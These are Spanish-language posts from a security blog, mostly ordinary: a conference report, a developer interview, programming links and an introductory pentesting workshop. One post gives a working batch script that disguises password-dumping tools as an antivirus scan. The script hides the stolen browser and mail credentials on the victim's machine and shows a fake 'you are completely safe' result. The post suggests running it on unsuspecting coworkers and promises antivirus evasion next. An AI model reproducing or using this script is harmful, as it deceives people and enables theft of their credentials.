El sábado vi el tuit de @neosysforensics en el cual compartia Exploits para rootear android, ya sea locales o remotos, en el cual me llamo bastante la atención el listado me puse a curiosear un poco en los links compartidos y ahi di con la siguiente hoja de cálculo en la cual te da varios enlaces para volverse root en los dispositivos,  identificando cada uno de ellos y a que version afecta,  Hoja de Calculo cabe recordar que geo hot sacó su propia herramienta por decirlo así la cual te permite volverte root en el dispositivo en lo personal recomiendo hacer este proceso aunque! tenemos algunas desventajas y ventajas por decirlo.

Des-Ventajas de ser Root algo de la mano de Hack&Beers por @Edusatoe. 




Ya despues de esto tomarás la decisión? 

Regards,
Snifer

PD: Lo siento por ayer no vino entrada por problemas de fuerza mayor! y la razón de esta entrada es porque vendra unita de forense especial ;). 
Leer Mas

¡ Bienvenidos ! Sin lugar a dudas, un excelente evento.


Welcome to the jungle !


Tuve la oportunidad de poder asistir por primera vez a la 8.8 y no me he desilusionado en ningún aspecto. Desde que me bajé del avión y hasta que me volví a subir para volver a Argentina, el trato, la amabilidad y la cortesía de Chile debe destacarse.



La primer noche antes del evento se hizo una cena invitando primeramente a Oradores (Tengo la oportunidad de que mi tío [Claudio Caracciolo - @holesec) me haya podido conseguir ir con el a las cenas y me haya presentado tanta gente ... pero al final del post daré las gracias así que no desesperen) y termino siendo de Oradores, Organizadores y algunos conocidos :) Así que aquí va la primer foto de todos nosotros !



El primero a la izquierda @lawwait (Lorenzo Martinez), @holesec (Claudio Caracciolo), @gaaabifranco (Yo, Gabriel Franco) , en el fondo se puede ver a @JulianZarate (Julian Zarate). En primero a la derecha es @DragonJAR (Jaime Andrés Restrepo), @pablogonzalezpe (Pablo Gonzalez) y de anteojos @TaiksonTexas (David Melendez)


Antes de empezar con éste artículo, quiero preguntarles .. ¿ Que tan serio es el evento si decimos que la temática de éste año es Superheroes ?

¡ Superheroes !

Ya desde su comienzo, el evento me gustó. La forma en que se jugaba con el público, las cosas que se decían de algunos patrocinadores que no nombraré y demás, me hacían pensar que sería una gran jornada.


El evento comenzó con la única charla en Inglés, dada por el (si mal no recuerdo) suizo Georg Greve quien es el CEO actual de Kolab Systems. Su charla "Restoring Cooperation - One Kolav Server at a time" se basó en presentar y relatar la forma de poder 'restaurar la cooperación' en Internet y terminar presentándonos un producto de Software Libre realizado por su empresa para simplificar la comunicación y colaboración en tu propio servidor. Si mucho no entendieron ésta breve reseña (disculpen, tengo mala memoria) los invito al sitio para que puedan conocerla aún más -> Kolab Systems

Restoring Collaboration - Georg Greve
Luego del primer coffee break era hora de una ansiada charla del maestro español, Lorenzo Martinez, quien nos presento su caso "CSI Madrid S13E37 – спасению", que cuenta un caso real donde la información de una computadora queda comprometida por algún tipo de ransomware. En la charla cuenta toda su línea de investigación y obviamente, con el humor que lo caracteriza. A mi gusto, una de las destacadas charlas que hubo en el evento.



"CSI Madrid S13E37 – спасению" - Lorenzo Martinez
Era el turno de los chilenos Francisco Candia y Javier Perez (quien además es uno de los organizadores del evento) para demostrarnos en su proyecto de Dreamlabs Technologies "Netobservatory, somebody is watching you". El proyecto era poder reconocer todas las direcciones IP's que se estén usando en Chile y poder sacar estadísticas varias. Un gran proyecto que recién está comenzando y parecer tener un excelente camino.


Javier Perez en la izquierda y Francisco Candia en medio del escenario - "Netobservatory"

Momento de uno de los más esperados, Jaime Andrés Restrepo (mas conocido como @DragonJAR) sobre como "Hackear carros en Latinoamérica". Fue una excelente demostración de los problemas de seguridad que tienen los autos más vendidos a nivel internacional y todo lo que ésto puede conllevar. Ésto quedó plasmado en una demostración live donde puede jugar con un usuario (dueño de un auto X) y como el puede controlarlo de forma remota. Sin palabras.


"Hackeando carros en Latinoamérica" - DragonJAR

Antes del almuerzo, el turno era de Pablo Gonzalez con su charla "Cyberwar: Looking for... citizen!"  a quien por suerte tuve el agrado de conocer y poder generar (a grosso modo) una amistad a la distancia. En un principio nos desarrolló los conceptos actuales del cibermundo con todo lo que ésto implica. Luego llevó su explicación, a la posibilidad de obtener el control de un dispositivo móvil para poder gestionarlo, controlarlo y básicamente hacer lo que uno quiere, de forma completamente remota, a través de un framework propio. De lo mejor que hubo en ésta ocasión de la 8.8

Pablo Gonzalez - "Cyberwar: Looking for... Citizen !"

Ya comidos, era el momento de escuchar una presentación que no tenía la más pálida idea de que podía tratarse, y puedo decir que quedé fascinado una vez que terminó. Quien estaba a cargo de ésta charla era (nada más ni nada menos) que un argentino, Julian Zárate quien nos iba a deleitar con "HTTP Break-header on GSM Networks". Para comenzar, una excelente introducción a los vocablos que crean diferencias bastantes graciosas entre los chilenos y los argentinos ('que es esa wea', 'tomar del pico' y muchas más) hizo, a mi gusto, que el público quede entusiasmado desde un principio. En su charla nos explico lo que eran las redes GSM (ya que absolutamente nadie en el público sabía mucho de éste tema) y sobre todo un componente importantísimo, el SGSN. Todo ésto, nos llevó a la explicación de un ataque donde uno puede engañar a servidores de compañías telefónicas, para poder aprovechar a hacer compras de aplicaciones sin gastar su propio dinero. Una charla excelente (que espero no haber explicado tan mal) en todos sus aspectos, primero por la calidad de habla de Julián y por otro, como llevó a participar al público. También, una de mis favoritas.

Julián Zarate, argentino radicado en Chile para hacer cosas malas en redes GSM - "HTTP Break-header on GSM Networks"

¡ Noche de cena ! Estábamos desparramados por 4 mesas, así que falta muchísima gente en esa foto.


Con el pulgar hacia arriba @insecurechile (Manuel Moreno), luego le sigue @holesec, @lawwait, Cesar Chavez. Desde la derecha, @DragonJAR, @gaaabifranco (Yo, nuevamente...) y @MatiasKatz.


Levantados de temprano para ir al segundo y último día de la 8.8, comenzamos con una Keynote del mexicano Jose Garduño con su presentación "The government as your hacking partner", donde se puede resumir el título a: "Como agradarle al gobierno". En la charla, nuestro amigo nos contó la posibilidad de obtener DEMASIADA información gracias a las fuentes abiertas y poder obtener resultados geniales, como por ejemplo bloquear una licencia de conducir, un pasaporte, entre otras maldades. Una gran charla, dada por una persona muy fluída y de por sí, muy cómica hizo que el público quede maravillado y contento con lo expuesto. También, dentro de las mejores charlas de éste año.

Toda la información que se puede recaudar gracias a las fuentes abiertas , José Garduño - "The government as your hacking partner"
Gracias a Gabriel Bergel (Organizador de la 8.8) por primera vez se hizo la presentación de un Drone, de la mano de otro español, con el cual tuve también la posibilidad de conocer, David Melendez con su exposición "Trash Robotic Drone Router Platform: An insane DIY approach to embedded systems". Fue una charla donde todos aquellos que andamos flojos en matemáticas/electrónica, en la noche podría haber sido posible tener pesadillas. David nos demostró como crear tu propio drone con maderas, un Router WiFi y un control de PS2 .. una locura para cualquier mortal. Como si fuera poco, hemos podido tener una demostración live del drone en acción (Tengo el video, voy a tratar de subirlo a YouTube y actualizar éste post). Charla,oratoria y demostración ... excelente !
Atropos, en primera persona.


David Melendez y a su derecha #Atropos

También una de las charlas mas esperadas que ya ha recorrido grandes eventos mundiales, "Hacking US (and UK, Australia, France, etc) traffic control systems" por parte del argentino Cesar Cerrudo. En éste caso, se explica una línea de investigación por la cual César adquiere un sistema de control de tráfico y puede estudiarlo en profundidad para poder llegar a éste increíble resultado. Manejar los semáforos y provocar cosas que solo veríamos en películas. Cabe aclarar que al principio de la charla, César nos comenta que en el manual de usuario de éstos sistemas, solo se dedicaba un muy pequeño párrafo a la seguridad, donde decían que era impenetrable éste sistema ...

Cesar Cerrudo demostrando como funcionan los dispositivos de control - "Hacking US (and UK, Australia, France, etc) traffic control systems"

Hora de un nuevo almuerzo, al cual con mis compañeros argentinos y españoles dijimos NO ! Es que era hora de recorrer un poco la ciudad y sacar alguna que otra selfie para nuestro querido Snifer.

De izquierda a derecha: @pablogonzalezpe (Pablo Gonzalez), @gaaabifranco, (de anteojos) @TaiksonTexas (David Melendez), (en el fondo) @lbrug y Diego Bruno (Telefónica Argentina)
Vueltos ya de nuestra recorrida, era turno de escuchar al maestro (y no lo digo por ser pariente) Claudio Caracciolo, donde nos recomienda que "Hasta los superheroes necesitan protección". La charla estuvo dedicada a los casos, en que nosotros desde nuestro lado del bien (también incluyo a los del lado oscuro) necesitamos una ayuda más, y para ello está Latch, servicio que nos permite agregar una capa de seguridad más a nuestros servicios online. 
Volviendo al hilo de la presentación, Claudio nos tiene acostumbrados, a quienes ya han participado de sus charlas, a mucha comedia en sus diapositivas. Ésta no fue la excepción, y hablando del caso #celebgate, demostró como el amigo @lawwait quedó como una víctima fatal en los diarios de Chile ...


Filtrado exclusivo de fotos de @lawwait en diarios chilenos.
En sí, una gran charla y un excelente orador hicieron que valga mucho la pena sentarse a escucharlo.


"Hasta los superheroes necesitan protección" - Claudio Caracciolo

Turno de hablar un poco de las BTC y su (in)seguridad, a cargo de Phillippe Camacho,  donde se pudo apreciar las posibilidades de manejar datos de forma segura en una red abierta, pero por otra parte también se notan los nuevos riesgos globales e incentivos para el cibercrimen.

Philippe Camacho - "Bitcoin y (In) Seguridad: 5 paradojas"

Para descontracturar y ya casi terminar el evento, una nueva visita de Dr Zombie para contarnos como debe ser un superheroe, sus cualidades y y sus (no tantas) semejanzas con la realidad. Una charla que sin duda, dejo con la cabeza en órbitas desconocidas a muchos de la audiencia.

"Historia de los Superheroes" - Dr Zombie

Y sí, se terminaba otro año de éste terrible evento, pero no antes de que Matias Katz nos presentara "Hardware Backdooring X11 with much class and no privileges". Una charla bien argentina, tanto por sus primeras diapositivas ... 

"Los argentinos tenemos los mejores cul*s, las mejores carnes y al Padre, al Hijo y al Espíritu Santo"

Como por sus vocablos subidos algo de tono, los cuales hicieron que la charla no solo sea entretenida, sino que también muy didáctica. Para no perder el hilo, Mati nos demostró la posibilidad de poder generar un backdoor para todo aquél SO que utilice X11, haciendo uso de llamadas a sistema, todo ésto a través de interrupciones de hardware. ¿El resultado de todo ésto junto? La posibilidad de desbloquear un ordenador, enchufando y desenchufando un auricular, o cerrando y abriendo la tapa de una notebook. A mi gusto, fue la mejor charla de la 8.8

Matias Katz - "Hardware Backdooring X11 with much class and no privileges"
A los 6 organizadores de éste terrible evento, mis aplausos.


De izquierda a derecha: Fermín Uribe, Gabriel Bergel, Javier Perez, Hector Escalona, Fabien Spychiger y Michael Price.
Para terminar la noche, creamos una 'cena' informal entre los speakers y conocidos que querían participar para poder despedir, lamentablemente, otro año de la 8.8

Last night !

Como simple anécdota de las tantas, en ésta última cena tardamos aproximadamente UNA HORA en hacer las cuentas y repartir los gastos de cada uno .. así es gente, somos hackers no matemáticos :P


No los voy a nombrar a todos nuevamente.

Para terminar ya éste post, quiero hacer una especie de dedicación a todos aquellos que tuve la oportunidad de conocer y a todos aquellos que ya conocía, para hacer de mi primera experiencia en la 8.8 sea algo increíble.

A mi familia y a Root Secure (empresa de la cual soy consultor) por dejarme ir en éstos días laborales y apoyarme en todo momento. A Gabriel Bergel (organizador de la 8.8 a quien pude conocer hace ya un tiempo en #ekoparty2012) por la entrada al evento y la buena predisposición que tuvo conmigo en todo momento. Y un agradecimiento especial a mi tío Claudio Caracciolo quien me presentó a todos sus excelentes amigos de éste entorno y me abrió muchísimas puertas a todo lo que es este lado de la informática.


Y obviamente, gracias al señor Jose @SniferL4bs por dejarme redactar ésta primera experiencia en la 8.8


No voy a dedicar más cosas porque ya me van a decir que parece una carta de amor ésto básicamente.

PD: Si algún speaker de la 8.8 lee el artículo y ve que lo que escribí como resúmen de su charla está mal, comunicarlo por favor. Repito, tengo mala memoria !

Por G.- de la Redacción de SniferL4bs.
Leer Mas
Siempre se ve la siguiente viñeta, que aborda la mejor escusa de los programadores para no trabajar, es cierto o no?



Pensando bien, emmm tiene razón siempre era esa la escucha perfecta que ponía en la Universidad y cuando andaba como desarrollado en Jala esta compilando por eso no ando haciendo algo, xD,

Pero alguien pensó cual es la escusa de lo Pentesters, los que andamos en este lado del charco??

Pues yo el fin de semana me puse a pensar, y modifique la viñeta, espero les agrade heee.



Regards,
Snifer

Leer Mas
¡ Buenas tardes compañeros ! 

A fin de éste año tengo la idea (ya casi confirmada) de rendir mi primera certificación de Seguridad Informática, en fin, la certificación CEH.

Leyendo una de las teorías, si mal no recuerdo era el capítulo de Malware, encontré ciertas herramientas para divertirnos con alguna PC de nuestros compañeros. Solo necesitaremos un USB y las herramientas que subí a este enlace, las cuales son las siguientes:

 - Firefox-AV
 - IE-AV
 - Mail-AV


Éstas herramientas se encargan de buscar información que queda almacenada en nuestro navegador o en alguna cuenta asociada a nuestro correo electrónico (Outlook en éste caso) y nos revelarán sus contraseñas. En sí, es un proceso algo más largo pero no nos vamos a meter en detalles y vamos a disfrutar de las herramientas !

Una vez que los hayamos descargado, podemos ejecutarlos y ver su potencial. (Voy a tratar de buscar alguna herramienta que pueda recuperar la información de Chrome y luego actualizaré el post)





Pero si realmente queremos divertirnos un poco con algunos compañeros algo despistados, podemos hacerle creer que son AntiVirus (por eso el AV como sufijo) para nuestras aplicaciones del ordenador (Total, todo el mundo descarga AV's falsos .. y .. quien desconfiaría de un hacker ahora ?)

Crearemos un simple script .bat con el siguiente fragmento:

@echo off
cls
echo "Generando un reporte del sistema, por favor aguarde ..."
start MAIL-AV.exe /stext MAIL.txt
start IE-AV.exe /stext IE.txt
start FIREFOX-AV.exe /stext FIREFOX.txt
timeout /t 5
cls
echo "Finalizacion de registro de la memoria, por favor revise el archivo Resultados.txt \n \n"
echo Estas completamente a salvo en tu sistema > Resultados.txt
pause
attrib +r +h +s FIREFOX.txt
attrib +r +h +s IE.txt
attrib +r +h +s MAIL.txt
exit

Al cual llamaremos Launcher-AV.bat o como quieran.

Al ejecutarlo, guardaremos los resultados de nuestras herramientas en diferentes archivos de texto, para luego ocultarlos y quedarnos con esos datos (Tranquilos, todo está en el script). Al usuario solo le mostraremos un falso Resultados.txt.

Para luego poder recuperar los archivos ocultos pueden usar el siguiente comando:


attrib -r -h -s /s /d


 Como recomendaciones, les digo que traten de que el usuario ejecute estas herramientas dentro del Pendrive, para poder ya tener la información oculta en el mismo.

Espero que se diviertan .. pero CON CUIDADO !

Antes de finalizar, quisiera disculparme por mi mala programacion en .bat, hace mucho no tocaba este tema. 

Ah, y me olvidaba. En la segunda parte vamos a aprender a ofuscar el código anterior y tratar de utilizar técnicas de encoding para bypassear AV's.

Por G.- de la Redacción de SniferL4bs.
Leer Mas
Buenas a todos esta es la primera oportunidad que se tiene en que std_io traiga una entrevista a SniferL4bs y que manera de iniciar con una entrevista a Cody Roodaka originalmente fue realizada en std-io, pero bueno venimos aquí para compartir aun mas con un   desarrollador de un framework (PHPmini) orientado a objetos en php, el framework aún no es público pero considero que será un gran framework, que realmente vale la pena ver.

El framework entre otras prestaciones tiene la capacidad de implementar componentes que den soporte mejorado a las aplicaciones diarias que se desarrollen, y utiliza una versión alterada de MVC.

Sin más pasemos a las preguntas.

¿Por qué razón se te dio por desarrollar un framework?

Pues, principalmente por necesidad e inconformidad. Originalmente inicié el Framework habiéndome frustrado en la búsqueda de un núcleo adecuado para tres proyectos personales.
Requería de algo que me permitiera programar cómodo, pero que no me limite en funcionalidad y flexibilidad, o que represente exceso de consumo de RAM injustificado. No me agradaron completamente los Frameworks más conocidos como CodeIgniter y Kohana, por lo que decidí construir (en primera instancia, de manera privada) el mío propio.

¿Ha sido una tarea dura/larga?

Pues, si bien no me surgieron problemas serios, el Framework sufrió reescritura tras reescritura, ya sea porque no me convence algo, u olvidé algún concepto, siempre renuevo su código -y la de todos sus componentes- para acercarme más a lo que quiero lograr; algo complejo, ligero y relativamente fácil de usar.
Algo que he de destacar es que quiero programar sin mirar el código de nadie más. Sí he escuchado, analizado y escrito conceptos complejos de Alexander, Ignacio Rostagno y otros programadores, pero sin mirar su código o preguntarles cómo lo harían. Y no fue hasta que le mostré el progreso a Alexander que mantuve esa ideología. Esto lo hago tanto por mera auto-superación, como por la búsqueda de un funcionar "único".

¿Cuál es la ventaja de tu framework contra los populares frameworks actuales (como yii, codeigniter, etc.)?

Buena pregunta. Todos son buenas bases para comenzar a programar, Pero muchos dejan atrás extensibilidad, flexibilidad y facilidad de uso por una mayor complejidad. A mi parecer, ese es un error gravísimo ya que la esencia de un framework es reducir el tiempo de desarrollo, y si para comenzar a crear una aplicación tengo que aprender a usar dicho framework como si programara en otro lenguaje, deja de ser redituable.
Mi punto de vista con respecto a la pregunta en concreto, es que mi framework apunta a ser utilizado con facilidad y comodidad.

¿Cuándo crees que estará publicada al menos la primer versión?

Mi meta personal es que para Noviembre del corriente año, el Framework ya esté dentro de un repositorio público en Github.

¿Qué nivel de seguridad crees que tenga tu framework para con ataques conocidos como rfi, lfi, sqli, xss, etc.?

Por suerte, mis conocimientos y amigos en el tema, como Alexander y Ernesto me permiten saber dónde y qué reforzar en materia de Seguridad. He de considerarle, modestias aparte, Seguro.
De por sí, la estructura del Framework inhibe LFI y RFI, y el funcionamiento de mi librería de bases de datos valida por sí misma todas las entradas.

¿Cuáles crees que sean los puntos débiles de tu framework?

Siempre hay cosas que mejorar, Alex, lo sabes. Opino que aún está muy verde como para decir "hay una falencia X". Además, no he hecho las pruebas que me permitan saber esa clase de cosas. Por otro lado, supongo que eso saldrá a la luz cuando sea probado por terceros.

¿Cómo maneja las vistas tu framework?, en algunos frameworks como codeigniter no cuentan con gestor de plantillas

Las vistas fueron uno de los muchos dolores de cabeza que he tenido. No quería poner a RainTPL y ya, eso no tenía razón de ser. Quería algo más dinámico, algo realmente útil.
Cuando comencé a plantearme la idea, me enfoqué en la Modularidad, tanto de CSS como de JS para lograr ese anhelado dinamismo. El componente por sí mismo actúa como Gestor de Plantillas, Archivos CSS, JS y de idiomas con una sencilla implementación que, a mi parecer, es muy cómoda.
Algo a destacar también, es su versatilidad a la hora de trabajar con AJAX.

Yo creo que deben probarlo, RainTPL (su gestor de plantillas) cuenta con un sistema de cacheado y además deja una vista clara y limpia, muy ordenada. La forma de manejar los modelos es muy buena, y los controladores no dejan nada que desear. Considero un framework limpio, claro con sus objetivos, minimalista que no consume casi recursos, muy bien estructurado, y recomendable.

Estaré esperando su lanzamiento, y les recomiendo que lo prueben.

Saludos! nos veremos en la próxima entrada :)
Leer Mas
Hola, que tal si andamos en algún lado por decirlo en una auditoria y es necesario hacer uso de algún script, ejecutarlo en el servidor pero como somos del ultimo momento llegamos a ejecutar el script y puffff hace todo menos lo que tenia que hacer, y la cara que ponemos es dafuq la arruine!




Pero que tal si tenemos la opción de corroborar el funcionamiento antes de ejecutarlo  y ver el comportamiento, viene a pelo no?  pero que pasa si no podemos instalar el interprete o el compilado la tenemos de frutas, ya que eso cualquiera pensaría en este punto entra en escena CompileOnline.com un TEU para trabajar, con varios lenguajes de programación para compilar de forma online y ver como anda nuestro bichito el listado de lenguajes es muy amplio a continuación una captura. 





Y un breve ejemplo de un soso python ;).




Y bueno el link donde esta ? xD lo se me olvide es Compileonline.com por si no se dieron cuenta gracias a Expermicid por dejarme conocer el sitio.

Regards,
Snifer
Leer Mas
Como todos los días ayer, despues del trabajo me meti a los feeds y llevaba dias sin ver el blog de 0verl0ad asi que al dar la revisada  y leer me encontre con un comentario en la entrada Juankeando con Python que por cierto ya viene en el blog #HackToPy que  serán scripts de los libros que vaya leyendo referente a Python aun mas estos van de la mano un poco hacia #GPT ;), pero bueno ya lo veremos en otra entrada, la de hoy es un video de Python si seguimos con la serie de Fideos de Python


Y como les decía el vídeo aborda el tema de interfaces como crear en linea de comandos y hacer nuestros programas mas sepsis a continuación les dejo tanto la presentación como la ponencia.

SLIDES!


VIDEO DE LA PONENCIA

Ya es viernes!! :D yeah!!!!!!!!!!!!

Regards,
Snifer
Leer Mas
Bienvenidos lectores! hoy les traigo un paper en formato pdf relacionado con calidad en desarrollo de software, la idea de este pdf es agrupar algunas de mis entradas (quizá las más importantes) relacionadas con el hilo "El arte de programar".


Este pdf reúne varias cosas, conceptos muy importantes a tener en cuenta, y por supuesto desde el punto de vista del software como actividad económica, agrupando las razones por las que aplicar cada criterio tanto así como una visión industrial de lo que todos conocemos como programación.

Programación como actividad económica, una visión del software como un trabajo.
Criterios de calidad, los criterios generales para medir cuándo un código es de calidad.
Calidad y balance, cuando corresponde aplicar los criterios y por qué.
Dificultades de aplicar calidad, existiendo la calidad por qué no es tan sencillo aplicarla y hay tan poco código de calidad abierto al público.
Por supuesto incluye una descripción detallada de cada criterio de calidad en particular, además una explicación extra para cada uno, y lecturas complementarias.

También comentamos que el próximo pdf estará relacionado con el proceso de normalización y ya se encuentra en el laboratorio de corrección de documentos, esperando los últimos ajustes para ser publicado.


Para cerrar la entrada nos gustaría que opinara sobre ¿qué tema te gustaría que publicaremos nuevas entradas?, envía tu sugerencia por medio del buzón de SniferL4bs o a nuestro twitter @std_io, @sniferl4bs también puedes comentarlo en ésta entrada.

Un saludo para todos los lectores!


Leer Mas
Como saben ando que me gusta y no me gusta Python en ese afán de ir aprendiendo y renegando cuando no funciona algo, me puse a revisar y buscar mas  información algun que otro libro que me permita conocer las pautas necesarias para un desarrollo aceptable o aun mejor estable y poder  conteplar el potencial del lenguaje en su totalidad asi que en ese afan de ir aprendiendo anoche, antes de dormir, que por cierto aquí hace un frio!! lo que me lleva al sobre a las 9:00 exagerando 10:00 pm de la noche y como veran ya ando despierto desde las 6:00 am aunque aun en el sobre incluso mientras escribo esta entrada,  di con el libro Testing Python Appliynd Unit Testing, TDD, BDD and Acceptance Testing de David Sale un libro actual que salio recientemente, así que tenemos material para estudiar y aprender creo que esto le agradara y bastante a @elcodigok  ;).

Regards,
Snifer





Leer Mas
Lunes y comenzamos con desarrollo, solo que ahora es para hablar de la libreria desarrollada por alex PHPSocketMaster.


En este manual utilizaremos la librería PHPSocketMaster que pueden ver su repositorio oficial aquí, para realizar clientes, servidores y servidores para websockets en php, entre otras cosas.

El documento incluye los siguientes temas:

Arquitectura Cliente/Servidor
Utilidad de sockets en php
Conceptos Claves de sockets
PHPSocketMaster como cliente
PHPSocketMaster como servidor de multiples conexiones
PHPSocketMaster como servidor para websockets
PHPSocketMaster como cliente HTTP

entre otros varios temas.

Pueden descargar el pdf aquí
Fuente Original
Leer Mas
Hola a todos, soy @sniferl4bs  esta oportunidad vengo a presentarle el talle de Pentesting con Kali Linux que realizare para Underc0de al final se encuentra el taller para descargarlo, espero les agrade. 



Contenido

0.- Pre - Boarding

1.- Que es un Penetration Testing

2.- Tipos de Pruebas en un Penetration Testing

•   Pruebas de Caja Gris- “Gray Box” / “Partial Disclosure”
•   Pruebas de Caja Blanca - “White Box” / “Full Disclosure”
•   Pruebas de Caja Negra - “Black Box” / “Blind”

3.- Categorización de un Penetration Testing

•   Intrusión Externa
•   Intrusión Interna

4.- Metodologías

•   OSSTMM (Open Source Security Testing Methodology)
•   ISSAF (Information Systems Security Assassment Framework)
•   Penetration Testing Framework  (Vulnerability Assessment  Penetration Testing Execution Standard)
•   OWASP




Pre – Boarding

Antes de iniciar con este taller, déjenme presentarme, soy Jose Moruno Cadima A.K.A Snifer, el cual andaré como “tutor” entre comillas; mas todo lo contrario, procederé a compartir el poco conocimiento que  he ido adquiriendo en la vida profesional. Tengo el gusto de estar trabajando en el área de seguridad informática, por lo que continuamente voy mejorando e incorporando nuevos conocimientos.


En el Taller abordaremos todo lo relacionado a un Pentesting: La distribución Kali Linux (la cual fue seleccionada por la calidad y apoyo de la comunidad que lo tiene en constantes actualizaciones), conoceremos el  funcionamiento de las herramientas, bajo entornos reales daremos objetivos a ser escaneados y obtención de información.   Otro aspecto importante a destacar, es que  habrá  algunos papers con Hacks, Tips relacionados a Pentesting en los cuales se abordará alguna herramienta de Seguridad,  la que  no estará directamente relacionada  con el contenido del Paper en curso.


Qué es un Penetration Testing

Antes de definir lo que es un Penetration Testing, primero corresponde  pensar como lo entendemos o  lo interpretamos.

¿Qué es para ti?

"Por favor, antes de seguir, pregúntate a ti mismo ¿qué es un Penetration Test?"

Ahora veamos qué es lo que dicen las principales fuentes  de información tomando a Wikipedia, OSSTMM, y NIST a efectos de obtener una concepción más acertada, permitiéndonos continuar el Taller con los conocimientos necesarios.


“Método para evaluar la seguridad de un sistema o red informática simulando un ataque de origen hostil” (Wikipedia)

“Una prueba de seguridad con un objetivo específico que termina cuando dicho objetivo se obtiene o se acaba el tiempo disponible” (OSSTMM – Open Source Security Testing Methodology Manual)

“Prueba de seguridad donde los evaluadores copian ataques reales para subvertir las funciones de seguridad de un aplicativo, sistema o red” (NIST – National Institute of Standards and Technology)

Para mí, un Penetration Testing , es  un conjunto de técnicas que permiten evaluar el nivel de seguridad de una organización o servicio brindado.
Por lo tanto un Penetration Testing, permite identificar falencias tecnológicas identificando vulnerabilidades, mediante la simulación del comportamiento de intrusos. Realizar dicha prueba no certifica que un sistema es "seguro"; hoy puede ser seguro a las 00:00 horas pero a 00:01 ya no es seguro, porque todo está en constante actualización. Por otro lado,  entra  por medio el Factor Humano -que por pereza o simpleza no modifica o deja las configuraciones por defecto- aunado  además,  que la seguridad absoluta no existe, es solo una  ilusión falsa de seguridad, por lo que es ilustrativa la siguiente analogía.

- ¿Por qué tenemos paredes en nuestras casas?
- ¿Por qué tenemos una puerta en nuestro hogar?

Las repuestas se resumen en que: "Solo damos una falsa sensación de estar seguros,  de que nadie podrá observarnos ni robar nuestras pertinencias; ya que si un ladrón desea ingresar a tu casa lo hará". Con la seguridad informática ocurre lo mismo, por más que estemos totalmente seguros que nada malo va a ocurrir la Ley de Murphy se hace presente.

“Notan que en el momento menos esperado sucede una desgracia.”

Actualmente, un Penetration Testing es considerado un recurso más  inmerso en las tareas de seguridad de las empresas, ya que algunas cuentan con un área específica que se dedica totalmente a esta actividad. Un Penetration Testing  llega a tener diferentes alcances tomando en cuenta lo que desea y la definición de lo que se hará y lo que no.


Tipos de Pruebas en un Penetration Testing

Al realizar una Penetration Testing se tiene 3 tipos de prueba las cuales son: Caja Negra, Blanca y Gris.  A continuación, se especifica a mayor detalle cada una de ellas.

Pruebas de Caja Negra - “Black Box” / “Blind”

Consiste en obtener la mayor información posible debido a que no se tiene  ningún conocimiento ni información previa sobre el sistema o red a ser analizado.

Pruebas de Caja Blanca - “White Box” / “Full Disclosure”

Consiste en que el consultor tiene acceso a toda la información, es decir, infraestructura, topología de Red, Direcciones IP, código fuente de los aplicativos, etc.

Pruebas de Caja Gris- “Gray Box” / “Partial Disclosure”

Es un término medio entre Black y White (cuya unión nos da el color gris), es una mezcla entre ambos; lo que implica que se obtiene un  conocimiento parcial y,  siendo este limitado no se tiene en detalle todo; definición que proviene de la contraparte, esto es, el contratante que solicita el test.


Categorización de un Penetration Testing

Principalmente existen dos  tipos que son:

• Intrusión Externa
• Intrusión Interna

A continuación, explicaremos de forma breve  en que consiste cada una:

• Intrusión Externa

El objetivo o finalidad  de una intrusión externa es la de acceder a equipos internos de la organización, escalar privilegios y obtener acceso root (Administrador). Cabe resaltar que este proceso es realizado con el objetivo de acceder al DMZ (Zona Desmilitarizada) desde afuera, mediante una serie de técnicas que van desde Ingenieria Social, Sniffing, Password Cracking; en resumen las mejores cartas del pentester son sacadas a la luz.

• Intrusión Interna

Como su nombre lo indica, una intrusión interna es dentro la organización conectándose a un punto físico o red Wifi -si se da el caso- con el fin de demostrar que tan insegura es la infraestructura tecnológica emulando ser un atacante interno;  desde luego, con los privilegios inferiores. En esta prueba, el objetivo es escalar, ver la información que está expuesta ya sea en compartidos, equipos servidores, contraseñas por defecto, mala configuración de servicios.


¡Hey! Alto y por qué no hablas de DoS!

Dado  que lo preguntan, conviene recordar que los ataques de denegación de servicio son coordinados  en la etapa interna, ya que al estar dentro de la empresa podemos ocasionar la caída de un equipo fundamental  para  ésta. En la etapa externa, en cambio no es necesaria la coordinación previa con nadie, debido a que cualquier persona puede ejecutar uno.


¿Pero que es un DoS o Denegación de Servicio?

Cierto, nos olvidamos de explicar qué es una denegación de servicio! Aún no es tarde para hacerlo; así, una denegación de servicio consiste en saturar un servicio con varias peticiones a la vez, siendo estas concurrentes de tal manera de sobrepasar su capacidad de concurrencia. Por ejemplo, si todos salimos de clase a la vez no podremos pasar por la puerta principal, ocasionando de esta manera una denegación de servicio,  ¿cuál es el servicio? La puerta que nos brinda la opción de salir.

Una descripción gráfica de una Denegación de Servicio.


Un Penetration Test tiene 4 etapas principales generalmente que son:

Reconocimiento
Escaneo
Enumeración
Obtener acceso (Backdorización)

Cada una de estas etapas las iremos desglosando en las próximas entregas.  En esta primera,  basta con conocer y saber su existencia; rescatando que si algo se menciona y no se profundiza,  es recomendable iniciar la búsqueda de información por  cuenta propia. Estos  talleres tienen como objetivo dar un pantallazo general y -al mismo tiempo-  sean un pequeño empujón para que ustedes se animen a indagar más.


Metodologías

Al realizar un Penetration Testing -gran parte de las veces- se toma en cuenta como base Metodologías ya definidas que cumplen ciertos estándares. Asimismo,  como también permiten identificar las principales falencias de la institución; a continuación, se nombran algunas y -las que según mi experiencia- considero principales o que brindan un mayor valor al momento de utilizarse.

OSSTMM (Open Source Security Testing Methodology)
ISSAF (Information Systems Security Assassment Framework)
Penetration Testing Framework  (Vulnerability Assessment  Penetration Testing Execution Standard)
OWASP

Desglosar cada una de ellas no tiene sentido, debido a que están debidamente documentadas en sus sitios respectivos; quizás en las próximas entregas, les dediquemos un análisis más profundo  o específico.
Para terminar la primera entrega, les dejo un par de preguntas -que prefiero-  sean respondidas en el foro:

1.- Prefieren realizar las pruebas en entornos reales o entornos controlables, es decir, poder usar de ejemplo algún sitio real online, o realizar la instalación de un laboratorio de pruebas y sobre él, trabajar de forma local.

2.- Sugerencias, comentarios algún punto que deseen que salga en el próximo taller como el primer bonus.



Donde pueden realizar sus preguntas y demas en este enlace
Leer Mas
Buenas tardes lectores, hoy les traigo otra entrada relacionada con el tema de los lenguajes de programación, java en android, ¿por qué lo eligieron?, empecé con las razones por las que uso php, luego hablé un poco de visual basic, y ahora hablaré sobre Java, todo esto en mi blog que puedes ver aquí.


